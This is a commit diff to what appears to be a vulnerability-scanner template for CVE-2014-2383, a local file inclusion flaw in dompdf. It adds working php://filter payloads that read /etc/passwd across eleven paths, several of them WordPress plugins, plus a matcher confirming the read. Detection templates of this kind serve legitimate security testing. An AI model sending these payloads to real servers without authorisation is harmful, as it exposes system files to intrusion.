Update CVE-2014-2383.yaml

2022-08-10 10:35:50 +05:30 · 2022-08-10 10:35:50 +05:30 · 4092577e94
parent db12feeead
commit 4092577e94
1 changed files with 20 additions and 17 deletions
--- a/cves/2014/CVE-2014-2383.yaml
+++ b/cves/2014/CVE-2014-2383.yaml
@ -1,8 +1,8 @@
 id: CVE-2014-2383

 info:
-  name: dompdf < v0.6.0 - Local File Inclusion
-  author: 0x_Akoko
+  name: Dompdf < v0.6.0 - Local File Inclusion
+  author: 0x_Akoko,akincibor,ritikchaddha
  severity: high
  description: |
    A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
@ -15,28 +15,31 @@ info:
  classification:
    cve-id: CVE-2014-2383
  metadata:
-    unix-payload: /dompdf.php?input_file=/etc/passwd
-    win-payload: /dompdf.php?input_file=C:/windows/win.ini
-  tags: cve,cve2014,dompdf,lfi,unauth
+    verified: true
+  tags: cve,cve2014,dompdf,lfi,wordpress,wp-plugin,wp

 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
-      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=dompdf.php"
+      - "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
      - type: word
        words:
          - "application/pdf"
@ -48,4 +51,4 @@ requests:
        status:
          - 200

-# Enhanced by mp on 2022/08/06
+# Enhanced by mp on 2022/08/06